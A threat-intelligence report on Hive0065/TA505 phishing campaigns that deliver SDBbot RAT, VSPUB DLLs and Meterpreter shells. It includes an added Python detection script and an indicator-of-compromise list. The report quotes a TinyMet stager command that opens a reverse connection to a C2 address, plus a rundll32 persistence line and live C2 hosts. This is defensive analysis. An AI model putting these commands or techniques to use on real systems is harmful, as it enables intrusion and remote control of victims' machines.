IBM X-Force Incident Response and Intelligence Services (IRIS) responds to security incidents around the world. While analyzing and comparing malicious activity on corporate networks, our team identified attacks probably linked to Hive0065, also known as TA505. We have observed that Hive0065 continues to distribute the SDBbot Remote Access Trojan (RAT) alongside other custom malware, and continues to exhibit the tactics it has used against businesses over the past year.
Attacks that deploy malware and RATs on targeted networks are one way for cybercrime groups to compromise networks and open channels for further activity, which may be immediate or may take place at a later stage. RATs are a common tool in targeted attacks because they give the attacker a wide range of remote actions. These include deploying additional malware, spying on users, and performing actions from the infected device or server on which they are installed.
Hive0065 is a financially motivated cybercrime group that has been actively targeting various industries, including finance, retail, and restaurants, since at least 2014. This group primarily conducts malicious spam campaigns delivering a wide range of custom and open-source malware. The most notorious are campaigns involving banking Trojans such as Dridex and TrickBot, ransomware such as Clop/Cryptomix and MINEBRIDGE, and extortion schemes demanding payment in bitcoin.
Familiar SDBbot and TTPs
In November 2019, X-Force IRIS observed a threat actor targeting employees of companies in Europe with a phishing e-mail spoofing the identity of Onehub, a legitimate cloud-based file sharing application for businesses. The email was designed to extract Active Directory (AD) discovery data and user credentials and to infect the environment with the SDBbot RAT. Based on our investigation and analysis of the actor’s tactics, techniques and procedures (TTP), their command and control infrastructure (C&C) and the use of specific malware previously attributed to the group, X-Force IRIS suspects that it is very likely that Hive0065 was behind the attacks.
SDBbot RAT has been observed in Hive0065 attacks since at least September 2019 and has been used primarily as a secondary payload. This malware has remote access capabilities, accepts commands from a C&C server (such as video recording), and is able to exfiltrate data from victim devices and networks.
In a variety of campaigns attributed to this group and previously reported by Proofpoint and ZeroFOX, Hive0065 conducted phishing campaigns that delivered malicious Excel (.XLS) files hosted on domains spoofing the Sync and Dropbox cloud storage sites. The campaigns also included C&C infrastructure impersonating other legitimate services, such as Google Drive and Microsoft Office.
More recent Hive0065 campaigns reported in March 2020 have exploited current interest in the COVID-19 pandemic, using coronavirus-themed phishing emails to deliver Locky ransomware and the Dridex banking Trojan. In some campaigns, Hive0065 has targeted healthcare organizations with emails purporting to be from medical research groups and offering so-called coronavirus remedies in exchange for bitcoin payments. The TTPs used in these campaigns align with those of Hive0065 / TA505, especially the spoofing of cloud storage websites to distribute malicious files.
Continued malicious activity
Research during the X-Force IRIS investigations revealed continued malicious activity by Hive0065, which infected corporate networks with malware and the SDBbot RAT. The TTPs we found are consistent with previous activity attributed to Hive0065:
- Spear phishing to deliver malware
- Macro-enabled documents
- The use of droppers containing embedded dynamic link libraries (DLLs)
- The use of an installer component
- The use of legitimate cloud hosting services for malware distribution
- Impersonation of legitimate services such as Microsoft and Google
- C&C domains with a similar naming convention and structure (examples of domain names below)
| Domains observed by X-Force | Domains reported by Proofpoint | Domains reported by ZeroFOX |
|---|---|---|
| drm-server-booking[.]com | google-news-server-drm[.]com | office in service[.]com |
| microsoft-live-us[.]com | update365-office-ens[.]com | googledrive-download[.]com |
| dl1.sync-share[.]com | office365-update-en[.]com | d1.syncdownloading[.]com |
Summary of the compromise
To gain access to victim environments, Hive0065 sent malicious e-mails to employees, claiming to come from the account of a human resources representative. The body of the email masqueraded as Onehub and prompted the recipient to download a malicious document named Resume.doc.
The employee who received this email downloaded and opened the document, which contained malicious code. Once the code executed, a persistence mechanism was installed and a malicious password-stealing component was run. In this case, once the malicious code executed, it dropped a malicious binary (a DLL) with similarities to CobaltStrike, which then created and executed additional files. The actor used the initially compromised system to escalate privileges and move laterally to other systems on the network.
Hive0065’s arsenal of tools
VSPUB DLL with CobaltStrike Code Similarities
The malicious email delivering the file named Resume.doc initially led the recipient to a malicious domain. After multiple redirects, the final redirect pointed to the malicious URL hxxps://dl1.sync-share[.]com?Or2at. In addition, we also observed employees who opened the document from hxxps://dl1.sync-share[.]com and downloaded Resume (1).doc and a second file, Resume (3).doc.
Seconds later, a suspicious document named main_template.docx was created.
Each time main_template.docx was opened, VBA macros executed and a fake Microsoft Office login window (FakeL.exe) was displayed to the user while a malicious payload ran in the background. If the password entered was correct, the window disappeared. Password attempts were written to a file named Password.txt, which was later deleted.
The document may also display a fake "This document is protected" message to prompt users to enable content and execute the malicious code. The .docx file contained embedded x86 and x64 versions of the payload DLL, so that the appropriate version is dropped depending on the target operating system.
The DLLs were placed in the following locations:
- x86: %APPDATA%\Microsoft\Windows\Template\vspub1.dll
- x64: %APPDATA%\Microsoft\Windows\Template\vspub2.dll
The DLLs were loaded into the memory space of winword.exe using the LoadLibraryW API. The DLL module was packed twice to hide the actual code: a custom packer layered on top of UPX, an open source executable packer. Unpacking both layers revealed the actual code.
Although these DLLs do not match any known code family, a code comparison showed similarities with the CobaltStrike framework. The VSPUB DLLs gather system information and send it via HTTP POST requests to the C&C domain microsoft-live-us[.]com/fidonet or the IP address 185[.]176[.]221[.]45. The code suggests that, upon a successful response from the server, the DLL may download and execute additional files.
Of note, microsoft-live-us[.]com was registered a few days before the attack, together with the domain sync-share[.]com, which includes the subdomains dl1.sync-share[.]com, dl2.sync-share[.]com and dl3.sync-share[.]com. sync-share[.]com is probably attacker-owned infrastructure, and although the dl2 and dl3 subdomains were not observed in this particular activity, it is likely that these domains will be used in the same way.
Meterpreter Reverse Shell
After the initial system was compromised, the actors compromised additional systems on the network by running malicious PowerShell services as local SYSTEM, as well as installing bind shells. A Meterpreter reverse shell was used to remotely control compromised systems within the internal network; it was installed as a service by executing an encoded PowerShell script. The malicious PowerShell command decodes to a reverse shell connecting to two malicious IP addresses:
- 91[.]214[.]124[.]20
- 91[.]214[.]124[.]25
While most of the samples we found during our investigations were Meterpreter reverse shells connecting back to a C&C IP address, Meterpreter bind shells that listen for incoming connections were also discovered. We found that a domain administrator account was compromised and that the PingCastle Active Directory audit tool was run. Using the domain administrator account, the actor was able to compromise several other accounts and execute malicious services and persistence mechanisms, namely SDBbot RAT loaders.
TinyMet Meterpreter Stager
The investigation led our team to discover a file named wsus.exe (a version of TinyMet, a tiny flexible Meterpreter stager), as well as three additional files that were created and executed on the first compromised system.
During the investigation, TinyMet was observed running with the command c:\intel\wsus.exe 1 91.214.124[.]20 43434, indicating a reverse HTTP connection to a malicious IP address; TinyMet can be configured either by renaming the binary or by supplying specific arguments. The commands executed were used for discovery purposes, listing members of privileged groups and network information.
SDBbot RAT
SDBbot RAT installer
X-Force IRIS found that the SDBbot RAT installers are packed x64 binaries that decrypt parts of the SDBbot code and strings during execution. In addition, they read a binary blob located in the registry at HKLM\MACHINE\SOFTWARE\Microsoft\[3 characters][1 character]. Depending on user privileges, the binary blob can be found in the registry value. If running with regular user privileges, the installer component establishes persistence using the registry Run key and executes ordinal #1 of the DLL:
rundll32 "C:\Users\[USER]\AppData\Roaming\xrjkrobuy.dll", #1
SDBbot RAT Loader
As part of the investigation, X-Force IRIS found that the SDBbot RAT loader we analyzed was similar in nature to the version analyzed by Proofpoint, which was defined as the "loader component" of SDBbot in the Hive0065 campaigns of October 2019. The loader component reads the binary blob and executes the shellcode it contains. Once executed, the shellcode decompresses and executes the SDBbot payload. The shellcode checks whether it has already been executed before the loader DLL files; if so ("TRUE"), the process exits.
SDBbot RAT Payload
Once the attackers gained a foothold on the network, four new registry keys were created in the local SOFTWARE hive and the SDBbot RAT loader DLLs were installed as persistence mechanisms; the loaders were injected into the winlogon.exe process each time that process ran.
At runtime, SDBbot RAT checks for the presence of the mutex windows_7_windows_10_check_running_once_mutex and proceeds to retrieve a C&C address from the file C:\ip.txt. If this file is not available, it uses the C&C drm-server-booking[.]com as the default server. SDBbot RAT then collects system information and communicates with the C&C server by sending and receiving a DWORD: 0xC0DE0000. The C&C sends additional arguments depending on the command.
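As an added defender-side example (not from the X-Force report or any IBM tool), the following Python triage function turns the host artifacts described in the VSPUB DLL, TinyMet and SDBbot sections above into detection rules run over constructed Sysmon-style events. The event field names and the sample rows are assumptions; the indicator values themselves are those listed in this report.

```python
import re

# Indicators from the report (defanging removed so they can be compared directly).
C2_IPS = {"91.214.124.20", "91.214.124.25", "185.176.221.45"}
C2_DOMAINS = {"drm-server-booking.com", "microsoft-live-us.com", "dl1.sync-share.com"}
SDBBOT_MUTEX = "windows_7_windows_10_check_running_once_mutex"

# SDBbot installer persistence: rundll32 running a DLL from AppData\Roaming by ordinal #1.
RUNDLL_ORDINAL = re.compile(r'rundll32(?:\.exe)?\s+"?[^"]*\\AppData\\Roaming\\[^\\"]+\.dll"?\s*,\s*#1\b', re.I)
# TinyMet stager invocation shape seen in the incident: <binary> <transport digit> <ip> <port>.
TINYMET_ARGS = re.compile(r'\.exe\s+\d\s+(\d{1,3}(?:\.\d{1,3}){3})\s+\d{1,5}\s*$')
# VSPUB payload DLLs in the Office template folder ("Template" as printed in the report) loaded by winword.exe.
VSPUB_LOAD = re.compile(r'\\Microsoft\\Windows\\Templates?\\vspub[12]\.dll$', re.I)

def triage_event(ev):
    """Return the names of the report-derived rules that fire on one event dict."""
    hits = []
    kind = ev.get("type")
    if kind == "ProcessCreate":
        cmd = ev.get("cmdline", "")
        if RUNDLL_ORDINAL.search(cmd):
            hits.append("sdbbot_installer_runkey")
        m = TINYMET_ARGS.search(cmd)
        if m and m.group(1) in C2_IPS:
            hits.append("tinymet_stager_to_known_c2")
    elif kind == "ImageLoad":
        if ev.get("image", "").lower().endswith("winword.exe") and VSPUB_LOAD.search(ev.get("loaded", "")):
            hits.append("vspub_dll_loaded_by_winword")
    elif kind == "NetworkConnect":
        if ev.get("dst_ip") in C2_IPS or ev.get("dst_host", "").lower() in C2_DOMAINS:
            hits.append("known_c2_destination")
    elif kind == "MutexCreate" and ev.get("name") == SDBBOT_MUTEX:
        hits.append("sdbbot_mutex")
    return hits

def run_triage(events):
    """Map event index -> fired rules, skipping events that fire nothing."""
    return {i: h for i, h in ((i, triage_event(e)) for i, e in enumerate(events)) if h}

# Constructed sample telemetry (not from the incident); benign rows are included on purpose.
SAMPLE_EVENTS = [
    {"type": "ProcessCreate", "cmdline": r'rundll32 "C:\Users\jdoe\AppData\Roaming\xrjkrobuy.dll", #1'},
    {"type": "ProcessCreate", "cmdline": r"c:\intel\wsus.exe 1 91.214.124.20 43434"},
    {"type": "ProcessCreate", "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"type": "ImageLoad", "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "loaded": r"C:\Users\jdoe\AppData\Roaming\Microsoft\Windows\Template\vspub1.dll"},
    {"type": "NetworkConnect", "dst_ip": "93.184.216.34", "dst_host": "example.com"},
    {"type": "NetworkConnect", "dst_ip": "185.176.221.45", "dst_host": "microsoft-live-us.com"},
    {"type": "MutexCreate", "name": SDBBOT_MUTEX},
]
```

The rundll32 rule keys on the ordinal-#1 entry point under AppData\Roaming rather than on the random DLL names, since those change per infection while the persistence shape does not.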
Conclusion
Hive0065 has been active since at least 2014, adjusting its TTP, its targeting and its infrastructure for each campaign. A relatively recent addition to Hive0065’s toolbox, SDBbot, is used in attacks primarily as second-stage malware, consisting of an installer, loader, and RAT components.
SDBbot has the ability to perform typical RAT functions, such as communicating with the C&C, receiving commands, and obtaining system information. On infected systems, this malware could give attackers an extended ability to drop and execute additional malicious payloads, control infected systems, and perform any action the legitimate user would have access to. Remote access Trojans are one of the most common tools in targeted attacks because they facilitate this type of control for remote attackers.
As X-Force IRIS continues to track Hive0065, we expect this group to continue targeting a wide range of industries, using social engineering to deliver open-source and custom malware while constantly adjusting its TTPs and C&C infrastructure to evade detection.
Indicators of compromise (IoCs)
C&C IP addresses
- 91[.]214[.]124[.]25
- 91[.]214[.]124[.]20
- 185[.]176[.]221[.]45
C&C domains
- drm-server-booking[.]com
- microsoft-live-us[.]com
- dl1.sync-share[.]com
Redirection URLs
- https://eur01.safelinks.protection.outlook[.]com/?url=https://clck.ru/JnFFT&data=02|01||bed42450519b40df4d8808d762bd4ff1|d847080b33824b27886012fe4d8edb27|1|0|637086437565223782&sdata=0VDHFFVSF
- https://clck[.]ru/JnFFT
- https://sba.yandex[.]net/redirect?url=https%3A%2F%2Fdl1.sync-share[.]com%3FOr2at&client=clck&sign=2a3f3d25a38344769c6cfb6705a0f918
Final redirect hosting the malicious document
- https://dl1.sync-share[.]com?Or2at
Files
| File name | SHA1 | Description |
|---|---|---|
| main_template.docx | 33094acd614825a916b77df6c5141c088fc3768b | Malicious document |
| vspub1.dll | bf0f7abda2228059bb00ec9658ee447fbe84d277 | CobaltStrike code similarities |
| vspub2.dll | d40510da42a478d72e649993208710668a7f6c27 | CobaltStrike code similarities |
| xrjkrobuy.dll | 14f52ae68344e1643b3066c10f7044fdd819db4e | SDBbot RAT |
| upywloeza.dll | 0cc7cca16afd632857e3883c06b2f55c057b563e | SDBbot RAT |
| dtzvlbtxn.dll | d36e983886a084887f887c6d562d3bc0664587c4 | SDBbot RAT |
| lvgoywrnxwy.dll | fea7d944e317c7b2ef1aba57600a8c5310368085 | SDBbot RAT |
| qcuqqgxmy.dll | 35423e04e58ab1f2267e19c47e1c69ea5b7041cc | SDBbot RAT |
| pdxqzmftr.dll | fd9620c0c295caaee3096423532bb1dbfb7064c5 | SDBbot RAT |
| lowpro3.13.exe | cb0b39534d99057b02b090c3650fb1de43d19a02 | Binary |
| wsus.exe | caff1d315a5d87014e5fa62346f58407755d971e | Meterpreter stager |
| FakeL.exe | 45c43ec18d15ba7850e6ad2e2e54671636f4d926 | Password stealer |